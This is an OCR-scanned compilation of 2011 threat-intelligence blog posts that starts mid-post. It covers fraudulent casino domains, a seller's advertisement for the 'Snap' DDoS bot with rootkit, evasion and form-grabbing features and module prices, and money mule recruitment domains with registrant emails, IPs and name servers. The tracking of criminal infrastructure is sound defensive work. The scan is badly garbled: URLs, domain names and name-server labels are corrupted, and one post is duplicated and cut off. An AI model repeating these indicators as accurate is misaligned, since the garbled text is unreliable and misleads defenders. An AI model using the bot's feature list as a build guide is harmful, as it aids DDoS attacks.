%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F %7d 
&state=422 

- marketing.valueactive.eu /VIP/animations/en/movies 
_en.htm 

Portfolio of fraudulent online gambling domains part of the 
campaign. The majority are hosted within AS49130, 

ARNET-AS SC ArNet Connection SRL: 

casino-elit-super.ru - 89.45.14.12 
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casinogoldsuper.ru - 89.45.14.12 
casinokingsuper.ru -89.45.14.12 
casino-king-super.ru - 89.45.14.12 
casinolabsuper.ru - 89.45.14.12 
casino-lux-super.ru - 89.45.14.12 



casinomultisuper.ru - 89.45.14.12 
casinonetsuper.ru - 89.45.14.12 
casino-net-super.ru - 89.45.14.12 
casinonextvip.ru - 89.45.14.12 
casino-online-super.ru - 90.182.175.234 
casinopartysuper.ru - 90.182.175.234 
casino-party-super.ru - 90.182.175.234 
casinoplazasuper.ru - 90.182.175.234 
lcasinostarsuper.ru - 90.182.175.234 
casinosuperelit.ru - 89.45.14.12 
casino-super-elit.ru - 89.45.14.12 
casinosuperking.ru - 89.45.14.12 
casino-super-king.ru - 89.45.14.12 
casinosupermulti.ru - 89.45.14.12 
casinosupernet.ru - 89.45.14.12 
casino-super-net.ru - 89.45.14.12 
casino-super-online.ru - 90.182.175.234 
casinosupervip.ru - 89.45.14.12 
casino-super-vip.ru - 89.45.14.12 
casinosuperweb.ru - 89.45.14.12 



casino-super-web.ru - 89.45.14.12 
casinosuperwin.ru - 89.45.14.12 
casino-super-win.ru - 89.45.14.12 
casinovipsuper.ru - 89.45.14.12 
casino-vip-super.ru - 89.45.14.12 
casino-win-super.ru - 89.45.14.12 
cazino-cash-multi.ru - 89.45.14.12 
3cazino-party-royal.ru - 89.45.14.12 
cazinopartyweb.ru - 89.45.14.12 
cazino-party-web.ru - 89.45.14.12 
cazinopartywin.ru - 89.45.14.12 
cazino-party-win.ru - 89.45.14.12 
cazinoplazawin.ru - 89.45.14.12 
cazinoplazaworld.ru - 89.45.14.12 
cazino-plaza-world.ru - 89.45.14.12 
cazinowinplaza.ru - 89.45.14.12 
cazino-win-plaza.ru - 89.45.14.12 
cazinoworldplaza.ru - 89.45.14.12 
cazino-world-plaza.ru - 89.45.14.12 
4elitcasinosuper.ru - 89.45.14.12 



elit-casino-super.ru - 89.45.14.12 
elitsupercasino.ru - 89.45.14.12 
elit-super-casino.ru - 89.45.14.12 
gamelabonline.ru - 78.46.105.205 
gameonlinelab.ru - 78.46.105.205 
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game-party-royal.ru - 78.46.105.205 
gamezlabonline.ru - 89.45.14.12 
gamezmultilab.ru - 89.45.14.12 
gamez-net-online.ru - 89.45.14.12 
gamezonlinenet.ru - 89.45.14.12 
gamez-party-royal.ru - 89.45.14.12 
gamez-party-web.ru - 89.45.14.12 
gamezpartywin.ru - 89.45.14.12 
gamez-party-win.ru - 89.45.14.12 
gamez-plaza-win.ru - 89.45.14.12 
gamezplazaworld.ru - 89.45.14.12 
gamez-plaza-world.ru - 89.45.14.12 
gamez-vegas-web.ru - 89.45.14.12 


gamezweblab.ru - 89.45.14.12 
gamezwinplaza.ru - 89.45.14.12 
gamez-win-plaza.ru - 89.45.14.12 
gamezworldplaza.ru - 89.45.14.12 
joker-gamez-web.ru - 89.45.14.12 
kingcasinosuper.ru - 89.45.14.12 
king-casino-super.ru - 89.45.14.12 
kinggagnerr.net - 90.182.175.234 
kingsupercasino.ru - 89.45.14.12 
king-super-casino.ru - 89.45.14.12 
lab-cazino-multi.ru - 89.45.14.12 
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lab-cazino-online.ru - 89.45.14.12 
labgamezonline.ru - 89.45.14.12 
lab-gamez-web.ru - 89.45.14.12 
labonlinecazino.ru - 89.45.14.12 
labonlinegame.ru - 78.46.105.205 
labvegascazino.ru - 89.45.14.12 
luxcasinosuper.ru - 89.45.14.12 
luxnextcasino.ru - 89.45.14.12 



lux-next-casino.ru - 89.45.14.12 
multicasinosuper.ru - 89.45.14.12 
multilabgame.ru - 78.46.105.205 
multisupercasino.ru - 89.45.14.12 
netcasinosuper.ru - 89.45.14.12 
net-casino-super.ru - 89.45.14.12 
netpartycazino.ru - 89.45.14.12 
netsupercasino.ru - 89.45.14.12 
net-super-casino.ru - 89.45.14.12 
nextcasinovip.ru - 89.45.14.12 
next-casino-vip.ru - 89.45.14.12 
next-lux-casino.ru - 89.45.14.12 
nextvipcasino.ru - 89.45.14.12 
onlinecasinosuper.ru - 90.182.175.234 
online-casino-super.ru - 90.182.175.234 
online-cazino-lab.ru - 89.45.14.12 
onlinegameznet.ru - 89.45.14.12 
online-gamez-vip.ru - 89.45.14.12 
onlinelabcazino.ru - 89.45.14.12 
onlinesupercasino.ru - 90.182.175.234 



online-super-casino.ru - 90.182.175.234 
partycasinosuper.ru - 90.182.175.234 
party-casino-web.ru - 78.46.105.205 
partycazinonet.ru - 89.45.14.12 
party-cazino-royal.ru - 89.45.14.12 
partycazinoweb.ru - 89.45.14.12 
partycazinowin.ru - 89.45.14.12 
partygamezroyal.ru - 89.45.14.12 
party-gamez-royal.ru - 89.45.14.12 
partygamezwin.ru - 89.45.14.12 
party-gamez-win.ru - 89.45.14.12 
partynetcazino.ru - 89.45.14.12 
party-royal-cazino.ru - 89.45.14.12 
party-super-casino.ru - 89.45.14.12 
partywebcasino.ru - 78.46.105.205 
partywebcazino.ru - 89.45.14.12 
partywincazino.ru - 89.45.14.12 
party-win-cazino.ru - 89.45.14.12 
play-multi-casino.ru - 89.45.14.12 
plazacazinowin.ru - 89.45.14.12 



plaza-cazino-win.ru - 89.45.14.12 
plazacazinoworld.ru - 89.45.14.12 
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plaza-cazino-world.ru - 89.45.14.12 
plaza-gamez-win.ru - 89.45.14.12 
plazagamezworld.ru - 89.45.14.12 
plaza-gamez-world.ru - 89.45.14.12 
plazawincazino.ru - 89.45.14.12 
plaza-win-cazino.ru - 89.45.14.12 
plazaworldcazino.ru - 89.45.14.12 
plaza-world-cazino.ru - 89.45.14.12 
royal-party-cazino.ru - 89.45.14.12 
star-casino-super.ru - 90.182.175.234 
star-super-casino.ru - 90.182.175.234 
super-casino-elit.ru - 89.45.14.12 
supercasinoking.ru - 89.45.14.12 
super-casino-king.ru - 89.45.14.12 
supercasinolab.ru - 89.45.14.12 
super-casino-land.ru - 90.182.175.234 
supercasinomulti.ru - 89.45.14.12 



supercasinonet.ru - 89.45.14.12 
super-casino-net.ru - 89.45.14.12 
supercasinoonline.ru - 90.182.175.234 
super-casino-online.ru - 90.182.175.234 
super-casino-star.ru - 90.182.175.234 
supercasinovip.ru - 89.45.14.12 
super-casino-vip.ru - 89.45.14.12 
super-casino-web.ru - 89.45.14.12 
super-casino-west.ru - 90.182.175.234 
supercasinowin.ru - 89.45.14.12 
super-casino-win.ru - 89.45.14.12 
super-elit-casino.ru - 89.45.14.12 
superkingcasino.ru - 89.45.14.12 
super-king-casino.ru - 89.45.14.12 
super-land-casino.ru - 90.182.175.234 
super-multi-casino.ru - 89.45.14.12 
supernetcasino.ru - 89.45.14.12 
super-net-casino.ru - 89.45.14.12 
superonlinecasino.ru - 90.182.175.234 
super-online-casino.ru - 90.182.175.234 



superpartycasino.ru - 90.182.175.234 
super-party-casino.ru - 89.45.14.12 
superstarcasino.ru - 90.182.175.234 
super-star-casino.ru - 90.182.175.234 
super-vip-casino.ru - 89.45.14.12 
super-web-casino.ru - 89.45.14.12 
super-west-casino.ru - 90.182.175.234 
superwincasino.ru - 89.45.14.12 
vegas-game-web.ru - 78.46.105.205 
vegas-gamez-multi.ru - 89.45.14.12 
vegasgamezweb.ru - 89.45.14.12 
vipcasinosuper.ru - 89.45.14.12 
vip-casino-super.ru - 89.45.14.12 
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vipnextcasino.ru - 89.45.14.12 
vipsupercasino.ru - 89.45.14.12 
vip-super-casino.ru - 89.45.14.12 
web-casino-super.ru - 89.45.14.12 
web-cazino-royal.ru - 89.45.14.12 
webgamezroyal.ru - 89.45.14.12 



webpartycazino.ru - 89.45.14.12 
web-super-casino.ru - 89.45.14.12 
west-super-casino.ru - 90.182.175.234 
wincasinosuper.ru - 89.45.14.12 
win-casino-super.ru - 89.45.14.12 
win-cazino-plaza.ru - 89.45.14.12 
win-gamez-plaza.ru - 89.45.14.12 
winpartycazino.ru - 89.45.14.12 
win-party-cazino.ru - 89.45.14.12 
winplazacazino.ru - 89.45.14.12 
win-plaza-cazino.ru - 89.45.14.12 
winsupercasino.ru - 89.45.14.12 
win-super-casino.ru - 89.45.14.12 
worldcazinoplaza.ru - 89.45.14.12 
world-cazino-plaza.ru - 89.45.14.12 
worldgamezplaza.ru - 89.45.14.12 
world-gamez-plaza.ru - 89.45.14.12 
world-plaza-cazino.ru - 89.45.14.12 
Monitoring of the campaign is ongoing. 
Related posts: 



[3] Don't Play Poker on an Infected Table - Part Four 

[4] Don't Play Poker on an Infected Table - Part Three 

[5] Don't Play Poker on an Infected Table - Part Two 

[6] Don't Play Poker on an Infected Table 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://ddanchev.blo as DOt.com/2011/Q4/dont-pla v- Poker- 
on-infected-table-part.html 

2 . 

http://www.virustotal.com/file-scan/report.html? 

id=491c291eaed67268dl4a36470e5d6f6d4ed829055fe4a 

2897ac5f0 

5 Qb50a2e3 6-1304948 544 

3. http://ddanchev.blo as pot.com/2011/Q4/dont-pla v- poker- 
on-infected-table-part.html 

4. http://ddanchev.blo as pot.com/2010/Q3/dont-pla v- poker- 
on-infected-table-part.html 

5. http://ddanchev.blo as pot.eom/2010/02/dont-pla v- poker- 
on-infected-table-part.html 

6. http://ddanchev.blo as pot.eom/2007/09/dont-pla v- poker- 
on-infected-table.html 

7. http://ddanchev.blo as pot.com/ 

8. http://twitter.com/danchodanchev 


































A Peek Inside a New DDoS Bot - "Snap" (2011-05-09 
17:03) 

Sampling malicious activity through the eyes of the 
cybercriminal, is always beneficial in the context of timely 

spotting valuable trends and fads within the ecosystem, 
given a decent sample of malicious activity is obtained. 

In this post, we'll review a new DDoS bot on the block - 
"Snap". 

This modular bot differentiates itself by offering the ability 
to choose between different modules to be added 

to the final package, and by allowing to perform to 
"proprietary" DDoS functions, namely the TurboSYN, and 

TrafficDDoS. Next to its core DDoS functionality, the coder of 
the bot is differentiating by offering Form Grabbing; 

Reverse Socks; MailSpamming; IM-Spamming and Exploits 
launching functionality. 

More details from the actual proposition: 

[+] language the bot is coded in : mASM 

[+] no external depencies, no run times, no frame works! 

[+] Ability to work with roaming user accounts 

[+] modularized structure of the bot 
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[+] Second Backup Service watch process Activity and 
restart hot on fail over 

[+] User Mode rOOtkit 

-> [+] run's as a service and hides itself 

-> [+] hides & protect root process 

-> [+] hides & protect files 

-> [+] hides the root processes 

-> [+] hides already used local &remote TCP Port(s) 

-> [+] hides already used local &remote UDP Port(s) 

-> [+] hides already used regkey's 

[+] semi polymorphic architecture 

-> [+] uses random legit process, file & service names 

-> [+] generates a unique stub every run 

[+] bot doesn't use eof, has no import table, doesnt need 
relocation and tls section => very good crypter support 

[+] Unicode support for Asian pcs 

[+] detects common sandboxes, virtual OSs, emulators, and 
analysis tools 

[ = = = = = = = = = = = = = = ==[ Webpanel ] ==- 





[+] the webpanel is developed with dreamweaver cs5 and 
ajax framework using mysql and php 

[+] multi theme support available 

[+] multi command support => every victim can do as 
many threads as you want it to 

[+] reliable protocol which creates the lowest possible 
server load 

[+] modularized structure of the bot 

[ = = = [ Modules ] ==- 

[+] Base price (Core) for 250 $ 

Loader: 

[+] Load module (simple) +0 $ 

[+] Load module (extended) for 50 $ 

Proxy: 

[+] Socks5 Deamon for 50 $ 

[+] reverse Socks 4/Socks 4a/Socks 5/ HTTP(s) for 150 $ 
DDoS: 

[+] DDoS Module (http/syn) for 50 $ 

[+] DDoS Module (full) for 100 $ 

DDoS (full) + Load module (extended) + Socks5 Deamon for 
400 $ 



Related posts: 

[I] Coding Spyware and Malware for Hire 

[2 ] Wi 11 Code Malware for Financial Incentives 

[3] E-crime and Socioeconomic Factors 

[4] Web Based Botnet Command and Control Kit 2.0 
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[5] BlackEnergy DDoS Bot Web Based 

[6] A New DDoS Malware Kit in the Wild 

[7] The Cyber Bot - Web Based Malware 

[8] The Black Sun Bot - Web Based Malware 

[9] Custom DDoS Capabilities Within a Malware 

[10] Botnet on Demand Service 

[II] Loads.cc - DDoS for Hire Service 

[12] Using Market Forces to Disrupt Botnets 

[13] Botnet Communication Platforms 

[14] A Botnet Master's To-Do List 

[15] DDoS on Demand VS DDoS Extortion 

[16] How Does a Botnet with 100k Infected PCs Look Like? 

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 
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5. http://ddanchev.blo as pot.com/2QQ8/Q2/blackener av- 
ddos-bot-web-based-c.html 

6. http://ddanchev.blo as pot.com/2QQ7/09/new-ddos- 
malware-kit-in-wild.html 

7. http://ddanchev.blo as pot.com/2QQ7/Q4/shots-from- 
malicious-wild-west-samole 2Q.html 

8. http://ddanchev.blo as pot.com/2Q07/Q4/shots-from- 
malicious-wild-west-sample_7672.html 

9. http://ddanchev.blo as pot.com/2QQ7/Q9/custom-ddos- 
capabilities-within-malware.html 

10. http://ddanchev.blo as pot.com/2QQ7/lQ/botnet-on- 
demand-service.html 


11. http://ddanchev.blo as pot.com/2QQ8/Q3/loadsccs-ddos- 
for-hire-service.html 


12. http://ddanchev.blo as pot.com/2QQ8/Q6/usin a -market- 
forces-to-disrupt-botnets.html 


13. http://ddanchev.blo as pot.com/2QQ7/Q3/botnet- 
communication-platforms.html 















































14. http://ddanchev.blo as pot.com/2QQ8/Q4/botnet-masters- 
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15. http://ddanchev.blo as oot.com/2QQ7/Q5/ddos-on- 
demand-vs-ddos-extortion.html 


16. http://ddanchev.blo as oot.com/2QQ8/Q5/how-does- 
botnet-with-lQOk-infected-ocs.html 

17. http://ddanchev.blo as oot.com/ 

18. http://twitter.com/danchodanchev 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Seven (2011-05-10 12:41) 

Continuing the what has turned into a tradition, the " 
[l]Keeping Money Mule Recruiters on a Short Leash" series, 
in this post we'll review currently active money mule 
recruitment sites, and provide vital OSINT data on what is 

currently acting as the the cornerstone of the monetization 
process that cybercriminals rely on - risk forwarding 

thanks to money mule recruitment for processing of 
fraudulently obtained funds. 

Description used on the majority of templates: 

11 Looking to buy art? Sell art? Alternative Art Ltd is the first 
choice for artists and buyers alike! Alternative Art Ltd is an 
effective tool for the artist and emerging artist to market 
and promote their art in a professional and inexpensive 
manner. We will market your art to the international 















community of art buyers. Whether you are looking to buy or 
sell original art, Alternative Art Ltd is the premier art site for 
those seeking to buy or sell original art online. 

NO COMMISSIONS! Whether you are looking to buy art or 
sell art, our site is fully optimized to get results 

FAST! Alternative Art Ltd is the future of buying and selling 
original art online. Artists who choose to sell their original 
art will receive maximum marketing exposure. For artists, 
selling your art has never been easier, faster, or more cost- 
effective. We will help you sell your original art DIRECTLY to 
buyers worldwide with NO COMMISSIONS. Those 

wishing to buy art online are invited to browse our 
extensive online galleries of original art. Never before has it 
been this easy for a buyer to select high-quality original art 
online. We update daily with new original art from our artist 
members. 

Alternative Art Ltd offers casual collectors and serious 
connoisseurs alike an amazing collection of original art 
pieces from the world over. You'll enjoy unparalleled 
customer care from a knowledgeable and friendly staff of 

experts. For artists, the inconvenience and high costs of 
traditional galleries are completely eliminated. Our team of 
experts puts the latest technology to work for you, putting 
your original art in front of millions of potential art buyers !" 

Money mule recruitment domains: 
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aimic-groupllc.at - Email: admin(a)aimic-groupllc.at 

ALTERNATIVEART-LTD.COM 



alternative-art-ltd.net - Email: ibsen@ppmail.ru 

artby-gorup.net - Email: admin@artby-gorup.net 

artby-group.biz - Email: blonde@bz3.ru 

art-marketllc.cc - Email: hear@ppmail.ru - [2]seen here 

artsolveltdco.at - Email: admin@artsolveltd.cc 

aspecs-group.cc - Email: admin@aspecs-group.cc 

ASPECS-GROUP.CC - Email: admin@aspecs-group.cc 

callisto-ltdco.net - Email: admin@callisto-ltdco.net 

collins-group.cc - Email: admin@megatechservicegroup- 
ltd.cc 

collins-groupusa.com - Email: admin@collins- 
groupusa.com 

COLLINS-GROUPUSA.COM - Email: admin@collins- 
groupusa.com 

competitorgroup-ltd.com - Email: trek@cheapbox.ru 

COMPETITOR-UK-GROUP.NET - Email: 
admin@competitor-uk-group.net 

DERWART-GROUP.AT - Email: admin@derwart-group.at 

derwart-group.com - Email: admin@ephesgroup-llc.biz 

drawmade-group.com - Email: admin@drawmade- 
group.com 

DURLEY-ARTAU.NET - Email: admin@durley-artau.net 



DURLEY-ART-GROUP.CC - Email: admin@durley-art- 
group.cc 

ephesgroup-llc.biz - Email: admin@ephesgroup-llc.biz 
EPHES-GROUPLLC.CC - Email: admin@ephes-groupllc.cc 
ephes-groupllc.net - Email: pious@ppmail.ru 

fourthgroup-ltd.cc - Email: rots@cheapbox.ru - [3]seen 

here 

FOURTH-UKLTD.NET - Email: admin@fourth-ukltd.net 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

GENERATION-TEAM.NET - Email: luis@cheapbox.ru 

groupinc-upland.biz - Email: admin@groupinc-upland.biz 

HELBY-GROUPLTD.BIZ - Email: admin@helby-groupltd.biz 

HELBY-GROUP-LTD.CC - Email: packet@bz3.ru 

koertig-gmbh.com - Email: usieeobq0604@yahoo.com 

kresko-group.biz - Email: admin@Kresko-group.biz 

LILAC-ANTIQUE.CC - Email: admin@lilac-antique.cc 

MASTERPIECE-GROUP.CC - Email: poop@ca4.ru 

MASTERPIECE-GROUP.ORG - Email: admin@masterpiece- 
group.org 

megatechservicegroup-ltd.cc - Email: 
admin@megatechservicegroup-ltd.cc 



MEGATECHSERVICE-GROUP-LTD.COM - Email: 
admin@collins-groupusa.com 

millennial-maingrop.net - Email: mock@free-id.ru 

mitissanservice-group-ltd.cc - Email: 
berra@cutemail.org 

mitissanservicegroup-ltd.com - Email: alibi@mailae.com 
neoline-groupco.cc - Email: admin@neoline-groupco.cc 
neoline-llc.net - Email: admin@neoline-llc.net 

qead-groupllc.net 

QEAD-LLC.BIZ - Email: admin@qead-llc.biz 

RICHMOND-ART-GROUP.COM - Email: binary@ca4.ru 

RICHMOND-ART-UK.BIZ - Email: admin@richmond-art- 
uk.biz 

sevg-groupnet.com - Email: belle@ca4.ru 
SEVG-GROUPNET.COM - Email: belle@ca4.ru 
sevg-incgr.net - Email: admin@sevg-incgr.net 

SQUIT-GROUP-LLC.BIZ - Email: swept@ca4.ru 
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SQUITGROUP-LLC.NET - Email: admin@squitgroup-llc.net 

targetmarketgroup-llc.cc - Email: 
admin@targetmarketgroup-llc.cc 


targetmarket-groupllc.net 

tazprogltd-us.com - Email: admin@tazprogltd-us.com 

TONSLEY-ART.COM - Email: pagan@ppmail.ru 

tonsley-group-uk.net - Email: admin@tonsley-group- 
uk.net 

WEST-VIEW-ART.CC - Email: knees@free-id.ru 
westview-art.net - Email: admin@westview-art.net 
Name servers of notice: 

NS1.USDENNS.SU - 217.23.15.136 
NS2.DNSUS.SU - 87.118.81.7 
NS3.NAMEUSNS.SU - 84.19.161.10 
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nsl.pidnsku.org - 86.55.210.23 
ns3.uslcopy.ws - 95.64.9.101 
ns2.uslcopy.at - 78.46.105.205 
ns2.stelsgid.net - 78.46.105.205 
nsl.usolomio.ee - 86.55.210.23 
ns2.usetmegold.su - 78.46.105.205 
ns3.usiami.su - 78.46.105.205 


nsl.ukansnami.com - 78.46.105.205 


ns3.uknamo.com - 66.199.236.116 

ns2.dnsukrect.com - 78.46.105.205 

Currently active and responding money mule recruitment 
domains, residing within AS42708, PORTLANE Network; 

AS29713, INTERPLEXINC Interplex LLC.; AS24940, 
HETZNER-AS Hetzner Online AG RZ: 

alternative-art-ltd.net - 193.105.134.234 

westview-art.net - 193.105.134.233 

RICHMOND-ART-UK.BIZ - 193.105.134.232 

fourthgroup-ltd.cc - 193.105.134.230 

artby-group.biz - 98.141.220.118 

collins-group.cc - 98.141.220.118 

aspecs-group.cc - 98.141.220.117 
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ASPECS-GROUP.CC - 98.141.220.117 
callisto-ltdco.net - 98.141.220.117 
drawmade-group.com - 98.141.220.117 
ephes-groupllc.net - 98.141.220.117 
targetmarketgroup-llc.cc - 98.141.220.117 
artby-gorup.net - 98.141.220.116 



tazprogltd-us.com - 98.141.220.116 

groupinc-upland.biz - 98.141.220.115 

neoline-llc.net - 98.141.220.115 

DERWART-GROUP.AT - 98.141.220.114 

ALTERNATIVEART-LTD.COM - 86.55.210.5 

collins-groupusa.com - 78.46.105.205 

COLLINS-GROUPUSA.COM - 78.46.105.205 

derwart-group.com - 78.46.105.205 

DURLEY-ARTAU.NET - 78.46.105.205 

DURLEY-ART-GROUP.CC - 78.46.105.205 

ephesgroup-llc.biz - 78.46.105.205 

EPHES-GROUPLLC.CC - 78.46.105.205 

kresko-group.biz - 78.46.105.205 

MASTERPIECE-GROUP.CC - 78.46.105.205 

QEAD-LLC.BIZ - 78.46.105.205 

SEVG-GROUPNET.COM - 78.46.105.205 

SQUITGROUP-LLC.NET - 78.46.105.205 

Psychological evaluation tests found within 
AS29713, basically every domain name has its 
associated binary: 


aimicgroupllc. exe 



artbygorup.exe 
aspecsgroup. exe 
atlantgroupmain. exe 
collinsgroupusa. exe 
createncegroupHc. exe 
derwartgroup. exe 
dogogroup.exe 
ephesgroupllc. exe 
megatechservicegroupltd. exe 
millennialartco. exe 
se vggroupnet. exe 
stilegroupllc. exe 
vin tagegro upin c. exe 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Six 

[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 



[6] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[8] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[9] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[10] Money Mule Recruiters on Yahool's Web Hosting 
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[11] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[12] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[13] Keeping Reshipping Mule Recruiters on a Short Leash 

[14] Keeping Money Mule Recruiters on a Short Leash 

[15] Standardizing the Money Mule Recruitment Process 

[16] lnside a Money Laundering Group's Spamming 
Operations 

[17] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[18] Money Mules Syndicate Actively Recruiting Since 2002 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eight - Historical OSINT (2011-05-25 13:18) 

With money mule recruitment scams continuing to 
represent an inseparable part of the cybercrime ecosystem, 
in 

this post I'll summarize the findings from an assessment I 
conducted on currently active mule recruitment scams 

over a month ago. As always, the historical OSINT offered is 
invaluable in case-building practices in particular a 

very well segmented group of mule recruiters using 
identical templates which they've purchased from a vendor 
of 





























standardized mule recruitment templates. 

Domains known to have been participating in money mule 
recruitment campaigns, currently offine: 

allston-groupsec.cc 

atca-inc.com 

atcanetworks.net 

BANDSGROUP-INC.NET 

BANDSGROUPNET.CC 

BANDS-GROUPSVC.COM 

BANDS-INC.COM 

CNLGROUP-INC.ee 

CNLGROUPNET.NET 

CNL-GROUPSVC.COM 

CNL-INC.COM 

evolving-inc.com 

evolvingsysinc.net 

galleogroupnet.net 

galleo-inc.com 

GIANT-GROUPCO.NET 


GIANTGROUPINC.COM 



GIANT-GROUPINC.COM 

GIANT-GROUPNET.CC 
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HOSTGROUPINC.COM 

HOSTGROUP-INC.COM 

HOSTGROUPNET.CC 

HOST-GROUPSVC.NET 

ICT-GROUPCO.COM 

ICTGROUPINC.COM 

ICTGROUPNET.CC 

ICT-GROUPSVC.NET 

IMPERIALGROUPCO.COM 

IMPERIAL-GROUPINC.COM 

IMPERIAL-GROUPSVC.NET 

INFOTECH-GROUPCO.NET 

INFOTECH-GROUPINC.COM 

infotechgroup-inc.com 

jvc-inc.com 

magnet-groupinc.cc 


netmarket-inc.com 



netmarkettech.net 


NOVARIS-GROUPLLC.TW 

NOVARISGROUPMAIN.TW 

NOVARIS-GROUPORG.CC 

PERSEUS-GROUPFINE.TW 

PERSEUS-GROUPINC.TW 

PERSEUSGROUPLLC.CC 

USIGROUPINC.COM 

USIGROUP-INC.COM 

USI-GROUPINC.NET 

USIGROUPNET.CC 

VITAL-GROUPCO.CC 

VITAL-GROUPCO.TW 

VITAL-GROUPINC.TW 

developgroupinc.net - 69.50.199.209 - Email: 
slows@5mx.ru 

develop-inc.com - 69.50.199.209 - Email: etude@qx8. 

mercygroupnet.net - 69.50.198.218 - Email: 
bowie@bigmailbox.ru 

mercy-inc.com - 69.50.198.221 - Email: 
spout@freenetbox.ru 



solarisgroupinc.com - 69.50.199.209 - Email: 
slows@5mx.ru 

solarisgroupnet.net - 69.50.198.197 - Email: 
sharp@maillife.ru 

jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru 

jvcgroupnet.net - 69.50.198.221 - Email: 
spout@freenetbox.ru 

Name servers of notice, historical OSINT for the responding 
IPs provided: 

nsl.kalipsol9.cc - 208.110.80.34 - Email: 
tarts@freenetbox.ru 

ns2.kalipsol9.cc - 64.85.169.70 

ns3.kalipsol9.cc - 173.208.132.42 

nsl.mamacholi.net - 208.110.80.35 - Email: 
excess@bigmailbox.ru 

ns2.mamacholi.net - 64.85.169.71 

ns3.mamacholi.net - 173.208.132.43 

nsl.rjevski.com - 208.110.80.34 - Email: 
low@bigmailbox.ru 
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ns2.rjevski.com - 64.85.169.70 
ns3.rjevski.com - 173.208.132.42 



nsl.runlesrun.ee - 208.110.80.37 - Email: 
frost@bigmailbox.ru 

ns2.runlesrun.ee - 64.85.169.73 

ns3.runlesrun.ee - 173.208.132.45 

nsl.skotinko.net - 208.110.80.38 - Email: 
info@dnregistrar.ru 

ns2.skotinko.net - 64.85.169.74 

ns3.skotinko.net - 173.208.132.46 

nsl.solojumper.com - 208.110.80.36 - Email: 
crime@bigmailbox.ru 

ns2.solojumper.com - 64.85.169.72 

ns3.solojumper.com - 173.208.132.44 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[1] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Six 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[4] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 



[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[6] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[8] Money Mule Recruiters on Yahool's Web Hosting 

[9] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[11] Keeping Reshipping Mule Recruiters on a Short Leash 

[12] Keeping Money Mule Recruiters on a Short Leash 

[13] Standardizing the Money Mule Recruitment Process 

[14] lnside a Money Laundering Group's Spamming 
Operations 

[15] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[16] Money Mules Syndicate Actively Recruiting Since 2002 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Eight - Historical OSINT (2011-05-25 13:18) 

With money mule recruitment scams continuing to 
represent an inseparable part of the cybercrime ecosystem, 
in 

this post I'll summarize the findings from an assessment I 
conducted on currently active mule recruitment scams 

over a month ago. As always, the historical OSINT offered is 
invaluable in case-building practices in particular a 

very well segmented group of mule recruiters using 
identical templates which they've purchased from a vendor 
of 

standardized mule recruitment templates. 

Domains known to have been participating in money mule 
recruitment campaigns, currently offine: 


allston-groupsec.cc 





















atca-inc.com 


atcanetworks.net 

BANDSGROUP-INC.NET 

BANDSGROUPNET.CC 

BANDS-GROUPSVC.COM 

BANDS-INC.COM 

CNLGROUP-INC.ee 

CNLGROUPNET.NET 

CNL-GROUPSVC.COM 

CNL-INC.COM 

evolving-inc.com 

evolvingsysinc.net 

galleogroupnet.net 

galleo-inc.com 

GIANT-GROUPCO.NET 

GIANTGROUPINC.COM 

GIANT-GROUPINC.COM 

GIANT-GROUPNET.CC 
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HOSTGROUPINC.COM 



HOSTGROUP-INC.COM 

HOSTGROUPNET.CC 

HOST-GROUPSVC.NET 

ICT-GROUPCO.COM 

ICTGROUPINC.COM 

ICTGROUPNET.CC 

ICT-GROUPSVC.NET 

IMPERIALGROUPCO.COM 

IMPERIAL-GROUPINC.COM 

IMPERIAL-GROUPSVC.NET 

INFOTECH-GROUPCO.NET 

INFOTECH-GROUPINC.COM 

infotechgroup-inc.com 

jvc-inc.com 

magnet-groupinc.cc 

netmarket-inc.com 

netmarkettech.net 

NOVARIS-GROUPLLC.TW 

NOVARISGROUPMAIN.TW 


NOVARIS-GROUPORG.CC 



PERSEUS-GROUPFINE.TW 


PERSEUS-GROUPINC.TW 

PERSEUSGROUPLLC.CC 

USIGROUPINC.COM 

USIGROUP-INC.COM 

USI-GROUPINC.NET 

USIGROUPNET.CC 

VITAL-GROUPCO.CC 

VITAL-GROUPCO.TW 

VITAL-GROUPINC.TW 

developgroupinc.net - 69.50.199.209 - Email: 
slows@5mx.ru 

develop-inc.com - 69.50.199.209 - Email: etude@qx8. 

mercygroupnet.net - 69.50.198.218 - Email: 
bowie@bigmailbox.ru 

mercy-inc.com - 69.50.198.221 - Email: 
spout@freenetbox.ru 

solarisgroupinc.com - 69.50.199.209 - Email: 
slows@5mx.ru 

solarisgroupnet.net - 69.50.198.197 - Email: 
sharp@maillife.ru 

jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru 



jvcgroupnet.net - 69.50.198.221 - Email: 
spout@freenetbox.ru 

Name servers of notice, historical OSINT for the responding 
IPs provided: 

nsl.kalipsol9.cc - 208.110.80.34 - Email: 
tarts@freenetbox.ru 

ns2.kalipsol9.cc - 64.85.169.70 

ns3.kalipsol9.cc - 173.208.132.42 

